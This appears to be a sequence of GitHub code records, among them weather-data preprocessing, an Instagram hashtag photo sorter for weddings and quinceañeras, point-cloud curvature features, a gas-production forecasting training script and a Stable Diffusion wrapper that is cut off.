pd\n\nfrom synop.consts import SYNOP_PERIODIC_FEATURES, VISIBILITY, DIRECTION_COLUMN, VELOCITY_COLUMN, GUST_COLUMN, \\\n TEMPERATURE, HUMIDITY, DEW_POINT, PRESSURE\nfrom wind_forecast.util.common_util import NormalizationType\n\n\ndef get_normalization_values(data: pd.DataFrame,\n normalization_type: NormalizationType = NormalizationType.STANDARD) -> (pd.DataFrame, float, float):\n if normalization_type == NormalizationType.STANDARD:\n data_mean = data.mean(axis=0)\n data_std = data.std(axis=0)\n return (data - data_mean) / data_std, data_mean, data_std\n else:\n data_min = data.min(axis=0)\n data_max = data.max(axis=0)\n return (data - data_min) / (data_max - data_min), data_min, data_max\n\n\ndef prepare_synop_dataset(synop_file_name: str, features: list, norm=True,\n dataset_dir=os.path.join(Path(__file__).parent, 'synop_data'),\n from_year=2001, to_year=2021,\n 
normalization_type: NormalizationType = NormalizationType.STANDARD,\n decompose_periodic=True) \\\n -> Union[Tuple[pd.DataFrame, float, float], pd.DataFrame]:\n synop_file_path = os.path.join(dataset_dir, synop_file_name)\n if not os.path.exists(synop_file_path):\n raise Exception(f\"Dataset not found. Looked for {synop_file_path}\")\n\n data = pd.read_csv(synop_file_path, usecols=features + ['year', 'month', 'day', 'hour'])\n data = data.dropna()\n if synop_file_name == 'WARSZAWA-OKECIE_352200375_data.csv':\n incorrect_gusts = data[data[GUST_COLUMN[1]] >= 22]\n incorrect_gusts = incorrect_gusts[incorrect_gusts[VELOCITY_COLUMN[1]] < 2]\n for index in incorrect_gusts.index:\n data.loc[index][GUST_COLUMN[1]] = data.loc[index-1][GUST_COLUMN[1]]\n\n features_to_check_for_zero_series = [feature for feature in features if feature in [\n VISIBILITY[1],\n DIRECTION_COLUMN[1],\n VELOCITY_COLUMN[1],\n GUST_COLUMN[1],\n TEMPERATURE[1],\n HUMIDITY[1],\n DEW_POINT[1],\n PRESSURE[1],\n ]]\n data = drop_zeros_series(data, features_to_check_for_zero_series, 12)\n\n data[\"date\"] = pd.to_datetime(data[['year', 'month', 'day', 'hour']])\n\n first_date = datetime.datetime(year=from_year, month=1, day=1)\n last_date = datetime.datetime(year=to_year, month=1, day=1)\n\n data = data[(data['date'] >= first_date) & (data['date'] < last_date)]\n\n if decompose_periodic:\n data = decompose_periodic_features(data, features)\n if norm:\n data[features], mean_or_min, std_or_max = get_normalization_values(data[features].values, normalization_type)\n return data, mean_or_min, std_or_max\n\n return data\n\n\ndef decompose_periodic_features(data: pd.DataFrame, all_features: List[str]):\n for feature in SYNOP_PERIODIC_FEATURES:\n min = feature['min']\n max = feature['max']\n column = feature['column'][1]\n series_to_reduce = pd.to_numeric(data[column])\n period_argument = ((series_to_reduce - min) / (max - min)).astype(np.float64) * 2 * np.pi\n data.insert(data.columns.get_loc(column), f'{column}-cos', np.cos(period_argument).tolist())\n data.insert(data.columns.get_loc(column), f'{column}-sin', np.sin(period_argument).tolist())\n data.drop(columns=[column], inplace=True)\n all_features = modify_feature_names_after_periodic_reduction(all_features)\n return data\n\n\ndef drop_zeros_series(data: pd.DataFrame, features: [str], min_series_len_to_remove: int):\n indices_to_remove = []\n for feature in features:\n series_list = data[feature].values\n consecutive_zeros = 0\n for index, val in enumerate(series_list):\n if val == 0 and index != len(series_list) - 1:\n consecutive_zeros += 1\n else:\n if consecutive_zeros >= min_series_len_to_remove or val == 0:\n indices_to_remove.extend(list(range(index - consecutive_zeros, index)))\n if val == 0:\n indices_to_remove.append(index)\n consecutive_zeros = 0\n\n return data.drop(data.index[indices_to_remove])\n\n\ndef modify_feature_names_after_periodic_reduction(features: list):\n new_features = features\n for feature in SYNOP_PERIODIC_FEATURES:\n index = new_features.index(feature['column'][1])\n new_features.insert(index, f'{feature[\"column\"][1]}-cos')\n new_features.insert(index, f'{feature[\"column\"][1]}-sin')\n new_features.remove(feature['column'][1])\n return new_features\n","repo_name":"adambelniak/WindForecast","sub_path":"src/wind_forecast/preprocess/synop/synop_preprocess.py","file_name":"synop_preprocess.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} 
+{"seq_id":"38359980447","text":"# author : Ryan\n# datetime: 2021/11/24 19:37\n# software: PyCharm\n\n\"\"\"\ndescription:\n\n\"\"\"\nfrom typing import List\n\n\nclass Lad:\n\n def longArrayDivide(self, array: List[int], low: int, mid: int, high: int) -> int:\n lef_sum = float('-inf')\n seq_sum = 0\n max_left = -1\n for i in range(mid, low, -1):\n seq_sum = seq_sum + array[i]\n if seq_sum > lef_sum:\n lef_sum = seq_sum\n max_left = i\n rig_sum = float('-inf')\n seq_r_sum = 0\n max_right = -1\n for j in range(mid + 1, high):\n seq_r_sum = seq_r_sum + array[j]\n if seq_r_sum > rig_sum:\n rig_sum = seq_r_sum\n max_right = j\n return (max_left, max_right), lef_sum + rig_sum\n\n\nif __name__ == '__main__':\n lad = Lad()\n array = [13, -3, -25, 20, -3, -16, -23, 18, 20, -7, 12, -5, -22, 15, -4, 7]\n low, mid, high = 0, len(array) // 2, len(array) - 1\n print(lad.longArrayDivide(array, low, mid, high))\n","repo_name":"EngineerFan/py-demo","sub_path":"src/algorithm/LongArrayDivide.py","file_name":"LongArrayDivide.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21787791770","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nquince_dict = {\n 'dress': 'prep',\n 'hair': 'prep',\n 'excite': 'prep',\n 'makeup': 'prep',\n 'make up': 'prep',\n 'escort': 'prep',\n 'ready': 'prep',\n 'florals': 'prep',\n 'flower': 'prep',\n 'table': 'prep',\n 'silverware': 'prep',\n 'placesetting': 'prep',\n 'decor': 'prep',\n 'planning': 'prep',\n 'arrange': 'prep',\n 'design': 'prep',\n 'entrance': 'prep',\n 'banquet': 'prep',\n 'hall':'prep',\n 'venue':'prep',\n 'music': 'dance',\n 'waltz': 'dance',\n 'father daughter': 'dance',\n 'fatherdaughter': 'dance',\n 'dj': 'dance',\n 'dance': 'dance',\n 'dancing': 'dance',\n 'groov': 'dance',\n 'shake': 'dance',\n 'disco': 'dance',\n 'rock': 'dance',\n 'boogie': 'dance',\n 'shimmy': 'dance',\n 'strut': 'dance',\n 'sway': 'dance',\n 'baila': 'dance',\n 'choreograph': 'dance',\n 'cake': 'food',\n 'bake': 'food',\n 'baked': 'food',\n 'dessert': 'food',\n 'cut': 'food',\n 'tier': 'food',\n 'yum': 'food',\n 'food': 'food',\n 'bar': 'food',\n 'chocolate': 'food',\n 'fruit': 'food',\n 'drink': 'food',\n 'cheers': 'food',\n 'delicious': 'food',\n 'catering': 'food',\n 'sugar': 'food',\n 'confection': 'food',\n 'photograph':'photoshoot',\n 'pic': 'photoshoot',\n 'shot': 'photoshoot',\n 'model': 'photoshoot',\n 'headshot': 'photoshoot',\n 'photoshoot': 'photoshoot',\n 'booth': 'photobooth',\n 'friend':'familyandfriends',\n 'sister':'familyandfriends',\n 'uncle':'familyandfriends',\n 'brother':'familyandfriends',\n 'mom':'familyandfriends',\n 'dad':'familyandfriends',\n 'father':'familyandfriends',\n 'mother':'familyandfriends',\n 'sibling':'familyandfriends',\n 'aunt':'familyandfriends',\n 'grandm':'familyandfriends',\n 'grandp':'familyandfriends',\n 'fam':'familyandfriends',\n 'squad':'familyandfriends',\n 'crew':'familyandfriends',\n 'people':'familyandfriends'\n}\n\n\nwedding_dict = {\n 'wedding dress': 'wedding prep',\n 'gown': 'wedding prep',\n 'tuxedo': 'wedding prep',\n 'wedding hair': 'wedding prep',\n 'excite': 'wedding prep',\n 'makeup': 'wedding prep',\n 'make up': 'wedding prep',\n 'ready': 'wedding prep',\n 'florals': 'wedding prep',\n 'venue': 'prelude',\n 'open air': 'prelude',\n 'outdoor': 'prelude',\n 'wedding guest': 'prelude',\n 'welcome': 'prelude',\n 'here comes': 'prelude',\n 'comes the bride': 'prelude',\n 'bridesmaids': 'prelude',\n 'maid of 
honor': 'prelude',\n 'best man': 'prelude',\n 'groomsmen': 'prelude',\n 'parents': 'prelude',\n 'just married': 'prelude',\n 'music': 'recessional',\n 'march': 'recessional',\n 'down the aisle': 'recessional',\n 'reception': 'reception',\n 'new husband': 'reception',\n 'new wife': 'reception',\n 'bouquet': 'reception',\n 'toss': 'reception',\n 'wedding favor': 'reception',\n 'dinner': 'reception',\n 'champagne': 'reception',\n 'garter': 'reception',\n 'toast': 'reception',\n 'speech': 'reception',\n 'twirl': 'first dance',\n 'first dance': 'first dance',\n 'dancing floor': 'first dance',\n 'lights down': 'first dance',\n 'dancing': 'first dance',\n 'dance': 'first dance',\n 'dancing shoes': 'first dance',\n 'cake': 'cake',\n 'bake': 'cake',\n 'baked': 'cake',\n 'dessert': 'cake',\n 'cut': 'cake',\n 'tier': 'cake',\n 'i now pronounce you': 'vows',\n 'man and wife': 'vows',\n 'mr. and mrs.': 'vows',\n 'mister and misses': 'vows',\n 'manandwife': 'vows',\n 'i do': 'vows',\n 'vow': 'vows',\n 'ring exchange': 'vows',\n 'ring': 'vows',\n 'diamond': 'vows',\n 'true love': 'vows',\n 'tie the knot': 'vows',\n 'love is patient': 'vows',\n 'love is kind': 'vows',\n 'you may now kiss': 'kiss',\n 'mwah': 'kiss',\n 'smooch': 'kiss',\n 'kiss': 'kiss',\n}\n\n#Extract the numer of posts under a hashtag\ndef number_of_post(soup):\n\n cont = soup.find(\"meta\", {\"name\": \"description\"})\n if cont:\n cont = cont['content']\n else:\n return None\n\n total_post = int(cont.split(' ')[0])\n\n if total_post < 11:\n maxphoto = total_post\n elif total_post < 15:\n maxphoto = total_post * 0.9\n elif total_post < 20:\n maxphoto = total_post * 0.8\n elif total_post < 30:\n maxphoto = total_post * 0.7\n else:\n maxphoto = total_post * 0.6\n\n return int(maxphoto)\n\n# returns photos prioritizing covering categories and then likes\ndef return_photos_wedding(result_temp,maxphoto):\n count = 0\n wedding_prep = []\n prelude = []\n recessional = []\n reception = []\n first_dance = []\n cake = []\n vows = []\n kiss = []\n other = []\n seen = []\n while count < maxphoto:\n for set_name, photo_set in result_temp.items():\n if photo_set != set([]) and count < maxphoto:\n photo, seen = best_photo(photo_set, seen)\n\n if len(photo) != 0:\n count = count + 1\n if set_name == \"cake\":\n cake.append(photo)\n elif set_name == \"kiss\":\n kiss.append(photo)\n elif set_name == \"first dance\":\n first_dance.append(photo)\n elif set_name == \"wedding_prep\":\n wedding_prep.append(photo)\n elif set_name == \"vows\":\n vows.append(photo)\n elif set_name == \"reception\":\n reception.append(photo)\n elif set_name == \"recessional\":\n recessional.append(photo)\n elif set_name == \"prelude\":\n prelude.append(photo)\n elif set_name == \"what also happened\":\n other.append(photo)\n seen.append(photo)\n\n\n result = {\"Preparation\":wedding_prep, \"Prelude\":prelude, \"Vows\":vows, \"Kiss\":kiss,\n \"Recessional\":recessional, \"Reception\":reception, \"First Dance\":first_dance,\"Sweet Time\":cake,\n \"What also Happened\":other}\n\n return result\n\n# returns photos prioritizing covering categories and then likes\ndef return_photos_quince(result_temp,maxphoto):\n count = 0\n prep = []\n dance = []\n food = []\n photobooth = []\n photoshoot = []\n familyandfriends = []\n other = []\n seen = []\n\n while count < maxphoto:\n for set_name, photo_set in result_temp.items():\n\n if photo_set != set([]) and count < maxphoto:\n photo, seen = best_photo(photo_set, seen)\n if len(photo) != 0:\n count = count + 1\n if set_name == \"food\":\n 
food.append(photo)\n elif set_name == \"dance\":\n dance.append(photo)\n elif set_name == \"qui_prep\":\n prep.append(photo)\n elif set_name == \"photobooth\":\n photobooth.append(photo)\n elif set_name == \"photoshoot\":\n photoshoot.append(photo)\n elif set_name == \"familyandfriends\":\n familyandfriends.append(photo)\n elif set_name == \"what also happened\":\n other.append(photo)\n seen.append(photo)\n\n\n result = {\"Preparation\":prep, \"Looking Good\":photoshoot, \"Get down\":dance, \"Yumyum\":food, \"Photobooth\":photobooth,\n \"Family and Friends\":familyandfriends, \"What also Happened\":other}\n\n return result\n\n\n# returns most liked photo from a set of photos\ndef best_photo(photo_set, seen):\n most_likes = 0\n best_photo = set()\n\n for photo in photo_set:\n if int(photo[1]) >= int(most_likes) and not photo in seen:\n most_likes = photo[1]\n best_photo = photo\n\n return best_photo, seen\n\n\n# Extract author of each post\ndef extract_username(shortcode):\n url = \"https://www.instagram.com/p/\" + shortcode + \"/\"\n r = requests.get(url)\n page = r.text\n soup = BeautifulSoup(page, 'html.parser')\n\n cont = soup.find(\"meta\", {\"name\":\"description\"})['content']\n username = cont.split('@')[1].split(')')[0]\n\n return username\n\n\n\n# Extract and return images based on keywords\n# Input: soup\n# Output: a dict of links with subevents\ndef extract_wedding_images(soup):\n\n max_post = number_of_post(soup)\n if max_post is None:\n return {\"Preparation\":[],\"Prelude\":[],\"Vows\":[],\"Kiss\":[],\n \"Recessional\":[], \"Reception\":[],\"First Dance\":[], \"Sweet Time\": [],\n \"What also happened\": []}\n\n\n scripts = soup.find_all('script')\n all_info = scripts[3].text.strip()\n\n wedding_prep = []\n prelude = []\n recessional = []\n reception = []\n first_dance = []\n cake = []\n vows = []\n kiss = []\n other = []\n\n nodes = all_info.split(\"\\\"node\\\":\")\n for x in nodes:\n if \"text\" in x and \"display_url\" in x:\n text = x.split('},')[0].lower()\n\n # extract username\n # temporary remove this part for faster processing\n shortcode = x.split('\"shortcode\":\"')[1].split('\",')[0]\n username = \"@\" #+ extract_username(shortcode)\n\n liked_count = x.split('\"edge_liked_by\":{\"count\":')[1].split('}')[0]\n jpg_link = x.split('\"display_url\":\"')[1].split('\"')[0]\n flag = 0\n\n # Search for a keyword in \"text\", and save corresponding url\n for keyword in wedding_dict.keys():\n if keyword in text:\n if wedding_dict.get(keyword) == \"cake\":\n cake.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"kiss\":\n kiss.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"first dance\":\n first_dance.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"wedding prep\":\n wedding_prep.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"vows\":\n vows.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"reception\":\n reception.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"recessional\":\n recessional.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"prelude\":\n prelude.append((jpg_link,liked_count,username))\n flag = 1\n if not flag == 1:\n other.append((jpg_link,liked_count,username))\n\n\n result_temp = {\"wedding_prep\":set(wedding_prep),\"prelude\":set(prelude),\"vows\":set(vows),\"kiss\":set(kiss),\n 
\"recessional\":set(recessional), \"reception\":set(reception),\"first dance\":set(first_dance), \"cake\": set(cake),\n \"what also happened\": set(other)}\n\n\n result = return_photos_wedding(result_temp,max_post)\n\n return result\n\n\n# Extract and return images based on keywords\n# Input: soup\n# Output: a dict of links with subevents\ndef extract_quince_images(soup):\n max_post = number_of_post(soup)\n\n if max_post is None:\n return {\"Preparation\": [], \"Looking Good\": [], \"Get down\": [], \"Yumyum\": [],\n \"Photobooth\": [], \"Family and Friends\": [], \"what also happened\": []}\n\n scripts = soup.find_all('script')\n all_info = scripts[3].text.strip()\n\n prep = []\n photoshoot = []\n dance = []\n food = []\n photobooth = []\n familyandfriends = []\n other = []\n\n\n nodes = all_info.split(\"\\\"node\\\":\")\n for x in nodes:\n if \"text\" in x and \"display_url\" in x:\n text = x.split('},')[0].lower()\n\n # extract username\n # temporary remove this part for faster processing\n shortcode = x.split('\"shortcode\":\"')[1].split('\",')[0]\n username = \"@\" #+ extract_username(shortcode)\n\n liked_count = x.split('\"edge_liked_by\":{\"count\":')[1].split('}')[0]\n jpg_link = x.split('\"display_url\":\"')[1].split('\"')[0]\n flag = 0\n\n # Search for a keyword in \"text\", and save corresponding url\n for keyword in quince_dict.keys():\n if keyword in text:\n if quince_dict.get(keyword) == \"familyandfriends\":\n familyandfriends.append((jpg_link,liked_count,username))\n flag = 1\n if quince_dict.get(keyword) == \"photobooth\":\n photobooth.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"dance\":\n dance.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"prep\":\n prep.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"photoshoot\":\n photoshoot.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"food\":\n food.append((jpg_link,liked_count,username))\n flag = 1\n\n if not flag == 1:\n other.append((jpg_link,liked_count,username))\n\n\n result_temp = {\"qui_prep\":set(prep),\"photoshoot\":set(photoshoot),\"dance\":set(dance),\"food\": set(food),\n \"photobooth\": set(photobooth),\"familyandfriends\":set(familyandfriends), \"what also happened\": set(other)}\n\n result = return_photos_quince(result_temp,max_post)\n\n return result\n\n\n\n\nif __name__ == '__main__':\n event_type = input(\"Please enter the type of your event: \")\n\n tag = input(\"Please enter a hashtag of your event: \")\n url = \"https://www.instagram.com/explore/tags/\" + tag + \"/\"\n\n\n r = requests.get(url)\n page = r.text\n soup = BeautifulSoup(page, 'html.parser')\n\n\n if event_type == \"wedding\":\n photos = extract_wedding_images(soup)\n elif event_type == \"quince\":\n photos = extract_quince_images(soup)\n else:\n print(\"Error! 
Check your input!\")\n\n\n print(\"Links of images: \")\n for k,v in photos.items():\n print(k)\n for x in v:\n print(x)\n print()\n","repo_name":"macchiatoyn/WeddingAlbum","sub_path":"Wedding_Album.py","file_name":"Wedding_Album.py","file_ext":"py","file_size_in_byte":14827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42909908486","text":"import open3d as o3d\nimport numpy as np\nimport sympy as sp\nimport math\nimport scipy as scp\nfrom Utilities import *\nimport functools\n@vectorize\nclass Signature:\n \n def __init__(self,pointcloud=None,KDT=None,point_index=None):\n self.pointcloud=pointcloud\n self.point_index=point_index\n self.KDT = KDT\n if pointcloud!=None:\n self.pointCoordinates=np.asarray(self.pointcloud.points)[point_index]\n def set_signatures(self,kmin,kmax,knor,minCurv,maxCurv,normal):\n self.Kmin=kmin\n self.Kmax=kmax\n self.Knor=knor\n self.minCurv=minCurv\n self.maxCurv=maxCurv\n self.normal=normal\n self.ratio=self.Kmin/self.Kmax\n self.Sum=self.Kmin+self.Kmax+self.Knor\n self.Omnivariance=(self.Kmin*self.Kmax*self.Knor)**(1/3)\n #self.Eigenentropy=-(self.Kmin*math.log(self.Kmin)+self.Kmax*math.log(self.Kmax)+self.Knor*math.log(self.Knor))\n self.Anistropy=(self.Kmax-self.Knor)/self.Kmax\n self.Planarity=(self.Kmin-self.Knor)/self.Kmax\n self.Linearity=(self.Kmax-self.Kmin)/self.Kmax\n self.surfaceVariation=self.Knor/(self.Sum)\n self.sphericity=self.Knor/self.Kmax\n self.lineFeature=0\n self.K1_K3=self.Kmax-self.Kmin\n self.K1_K2=self.Kmax-self.Knor\n self.K1_K2_K3=self.Kmax-self.Knor-self.Kmin\n self.ratio_dis=(self.Knor/self.Kmin)-1\n\n def set_2D_signatures(self,kmin,kmax,knor,minCurv,maxCurv,normal):\n self.Kmax=kmax\n self.Knor=knor\n self.maxCurv=maxCurv\n self.normal=normal\n #self.ratio=self.Kmin/self.Kmax\n self.Sum=self.Kmax+self.Knor\n self.Omnivariance=(self.Kmin*self.Kmax*self.Knor)**(1/3)\n #self.Eigenentropy=-(self.Kmin*math.log(self.Kmin)+self.Kmax*math.log(self.Kmax)+self.Knor*math.log(self.Knor))\n self.Anistropy=(self.Kmax-self.Knor)/self.Kmax\n self.Planarity=(self.Kmin-self.Knor)/self.Kmax\n self.Linearity=(self.Kmax-self.Kmin)/self.Kmax\n self.surfaceVariation=self.Knor/(self.Sum)\n self.sphericity=self.Knor/self.Kmax\n self.lineFeature=0\n self.K1_K3=self.Kmax-self.Kmin\n self.K1_K2=self.Kmax-self.Knor\n self.K1_K2_K3=self.Kmax-self.Knor-self.Kmin\n self.ratio_dis=(self.Knor/self.Kmin)-1\n\n def build(self,NN_Criteria=\"RNN\",NN=20,rad=0.6):\n Normals=np.zeros([3,1])\n MinCurDir=np.zeros([3,1])\n MaxCurDir=np.zeros([3,1])\n NormalVal=np.zeros([1,1])\n MinCurVal=np.zeros([1,1])\n MaxCurVal=np.zeros([1,1])\n [N,K1,K2]=getPrincipalDir(self.pointcloud,self.pointCoordinates,self.KDT,NN_Criteria,NN,rad)\n Normals=N[1]\n MinCurDir=K1[1]\n MaxCurDir=K2[1]\n NormalVal=N[0]\n MinCurVal=K1[0]\n MaxCurVal=K2[0]\n self.set_signatures(MinCurVal,MaxCurVal,NormalVal,MinCurDir,MaxCurDir,Normals)\n\n def dimension(self,rigid):\n if rigid:\n return 2\n else:\n return 1\n\n def is_umbilical(self,criteria,th):\n if criteria==\"ratio\":\n return abs(self.ratio)<th\n elif criteria==\"sphericity\":\n return abs(self.sphericity)>th\n\n def flatten(self,rigid):\n if rigid:\n return [self.Kmin,self.Kmax]\n else:\n return [self.Kmin/self.Kmax]\n\n @vectorize\n def v_build(self,signature,NN_Criteria=\"RNN\",NN=20,rad=0.6):\n Normals=np.zeros([3,1])\n MinCurDir=np.zeros([3,1])\n MaxCurDir=np.zeros([3,1])\n NormalVal=np.zeros([1,1])\n MinCurVal=np.zeros([1,1])\n MaxCurVal=np.zeros([1,1])\n 
[N,K1,K2]=getPrincipalDir(signature.pointcloud,signature.pointCoordinates,signature.KDT,NN_Criteria,NN,rad)\n Normals=N[1]\n MinCurDir=K1[1]\n MaxCurDir=K2[1]\n NormalVal=N[0]\n MinCurVal=K1[0]\n MaxCurVal=K2[0]\n signature.set_signatures(MinCurVal,MaxCurVal,NormalVal,MinCurDir,MaxCurDir,Normals)\n\n @vectorize\n def v_flatten(self,signature,rigid):\n if rigid:\n return (signature.Kmin,signature.Kmax)\n else:\n return [signature.Kmin/signature.Kmax]\n","repo_name":"grmc1999/Structural_recognition","sub_path":"Simetrias/Utils/Signatures.py","file_name":"Signatures.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34346505826","text":"#найти последнюю цифру n-го числа Фибоначчи (1 <= n <= 10**7)\n\ndef fib(n):\n # put your code here\n arr = []\n arr.append(0)\n arr.append(1)\n for i in range(2,n+1):\n arr.append((arr[i-1] + arr[i-2]) % 10)\n return arr[n]\n\ndef main():\n n = int(input())\n print(fib(n))\n\n\nmain()","repo_name":"data-hex/algorithms","sub_path":"fibbonacci_last_digit.py","file_name":"fibbonacci_last_digit.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4937768870","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport expt_settings.configs\nimport tft_model\nfrom data_formatters import window_generator\nfrom losses.pinball_loss import PinballLoss\nfrom losses.mae_loss import MAELoss\nfrom losses.rce_loss import RCELoss\n\npd.options.display.max_columns = 1000\n\nExperimentConfig = expt_settings.configs.ExperimentConfig\nconfig = ExperimentConfig('gas_production', 'outputs')\ndata_formatter = config.make_data_formatter()\ndata_csv_path = config.data_csv_path\n# train_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTrain.csv')\n# valid_csv_path = os.path.join(config.data_folder, 'GasProductionTFTValid.csv')\n# train_and_val_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTrainAndVal.csv')\n# test_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTest.csv')\n\nif __name__ == '__main__':\n raw_data = pd.read_csv(data_csv_path, index_col=0)\n train, valid, test, train_and_val = data_formatter.split_data(raw_data)\n # if not os.path.exists(test_csv_path) or not os.path.exists(valid_csv_path) or not os.path.exists(train_csv_path)\\\n # or not os.path.exists(train_and_val_csv_path):\n # train, valid, test, train_and_val = data_formatter.split_data(raw_data)\n # train.to_csv(train_csv_path, index=False)\n # valid.to_csv(valid_csv_path, index=False)\n # train_and_val.to_csv(train_and_val_csv_path, index=False)\n # test.to_csv(test_csv_path, index=False)\n # else:\n # train = pd.read_csv(train_csv_path)\n # valid = pd.read_csv(valid_csv_path)\n # train_and_val = pd.read_csv(train_and_val_csv_path)\n # test = pd.read_csv(test_csv_path)\n # Sets up default params\n data_formatter.set_scalers(train)\n mean, std = data_formatter.get_mean_std()\n # Use all data for label encoding to handle labels not present in training.\n fixed_params = data_formatter.get_experiment_params()\n\n params = data_formatter.get_default_model_params\n fixed_params.update(params)\n\n fixed_params['batch_first'] = True\n fixed_params['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n 
fixed_params['quantiles'] = [0.5]\n\n elect = window_generator.TSDataset(fixed_params, data_formatter.transform_inputs(train), num_samples=256)\n loader = DataLoader(\n elect,\n batch_size=fixed_params['minibatch_size'],\n num_workers=4,\n shuffle=False\n )\n\n valid_ds = window_generator.TSDataset(fixed_params, data_formatter.transform_inputs(valid), num_samples=1)\n valid_loader = DataLoader(\n valid_ds,\n batch_size=fixed_params['minibatch_size'],\n num_workers=4,\n shuffle=False\n )\n\n model = tft_model.TFT(fixed_params).to(fixed_params['device'])\n\n # q_loss_func = RMSSELoss(fixed_params['device'])\n # q_loss_func = SMAPELoss(fixed_params['device'])\n # q_loss_func = QuantileLoss(fixed_params['quantiles'])\n q_loss_func = PinballLoss(0.50, fixed_params['device'])\n mae_loss_func = MAELoss(mean, std, fixed_params['device'])\n\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n model.train()\n losses_mae = []\n losses_rce = []\n for i in range(fixed_params['num_epochs']):\n epoch_loss_train_mae = []\n progress_bar = tqdm(enumerate(loader))\n for batch_num, batch in progress_bar:\n optimizer.zero_grad()\n output, all_inputs, attention_components = model(batch['inputs'])\n # output.shape = [batch_size, forecast_horizon, 1],\n # all_inputs = [batch_size, total_time_steps, 5]\n loss = q_loss_func(output.squeeze(2), batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), fixed_params['max_gradient_norm'])\n optimizer.step()\n\n mae_loss = mae_loss_func(output.squeeze(2),\n batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n\n epoch_loss_train_mae.append(mae_loss.item())\n print(\"Epoch {}: MAE Train Loss = {}\".format(i, np.mean(epoch_loss_train_mae)))\n\n epoch_loss_eval_mae = []\n for idx, batch in enumerate(valid_loader):\n with torch.no_grad():\n output, all_inputs, attention_components = model(batch['inputs'])\n mae_loss = mae_loss_func(output.squeeze(2),\n batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n\n epoch_loss_eval_mae.append(mae_loss.item())\n print(\"Epoch {}: MAE Eval Loss = {}\".format(i, np.mean(epoch_loss_eval_mae)))\n losses_mae.append(np.mean(epoch_loss_eval_mae))\n\n if np.mean(epoch_loss_eval_mae) <= min(losses_mae):\n torch.save(model.state_dict(), config.model_folder + '/gas_production_best_model_loss.pth')\n","repo_name":"gaosuqi/GasWell","sub_path":"gas_tft/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17816004079","text":"from typing import Optional, List\n\nimport numpy as np\nimport torch\nfrom cv2 import dilate\nfrom diffusers import DDIMScheduler, StableDiffusionPipeline\nfrom tqdm import tqdm\n\nfrom src.attention_based_segmentation import Segmentor\nfrom src.attention_utils import show_cross_attention\nfrom src.prompt_to_prompt_controllers import DummyController, AttentionStore\n\n\ndef get_stable_diffusion_model(args):\n device = torch.device(f'cuda:{args.gpu_id}') if torch.cuda.is_available() else torch.device('cpu')\n if args.real_image_path != \"\":\n scheduler = DDIMScheduler(beta_start=0.00085, beta_end=0.012, beta_schedule=\"scaled_linear\", clip_sample=False, set_alpha_to_one=False)\n ldm_stable = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", use_auth_token=args.auth_token, scheduler=scheduler).to(device)\n else:\n ldm_stable = 
StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", use_auth_token=args.auth_token).to(device)\n\n return ldm_stable\n\ndef get_stable_diffusion_config(args):\n return {\n \"low_resource\": args.low_resource,\n \"num_diffusion_steps\": args.num_diffusion_steps,\n \"guidance_scale\": args.guidance_scale,\n \"max_num_words\": args.max_num_words\n }\n\n\ndef generate_original_image(args, ldm_stable, ldm_stable_config, prompts, latent, uncond_embeddings):\n g_cpu = torch.Generator(device=ldm_stable.device).manual_seed(args.seed)\n controller = AttentionStore(ldm_stable_config[\"low_resource\"])\n diffusion_model_wrapper = DiffusionModelWrapper(args, ldm_stable, ldm_stable_config, controller, generator=g_cpu)\n image, x_t, orig_all_latents, _ = diffusion_model_wrapper.forward(prompts,\n latent=latent,\n uncond_embeddings=uncond_embeddings)\n orig_mask = Segmentor(controller, prompts, args.num_segments, args.background_segment_threshold, background_nouns=args.background_nouns)\\\n .get_background_mask(args.prompt.split(' ').index(\"{word}\") + 1)\n average_attention = controller.get_average_attention()\n return image, x_t, orig_all_latents, orig_mask, average_attention\n\n\nclass DiffusionModelWrapper:\n def __init__(self, args, model, model_config, controller=None, prompt_mixing=None, generator=None):\n self.args = args\n self.model = model\n self.model_config = model_config\n self.controller = controller\n if self.controller is None:\n self.controller = DummyController()\n self.prompt_mixing = prompt_mixing\n self.device = model.device\n self.generator = generator\n\n self.height = 512\n 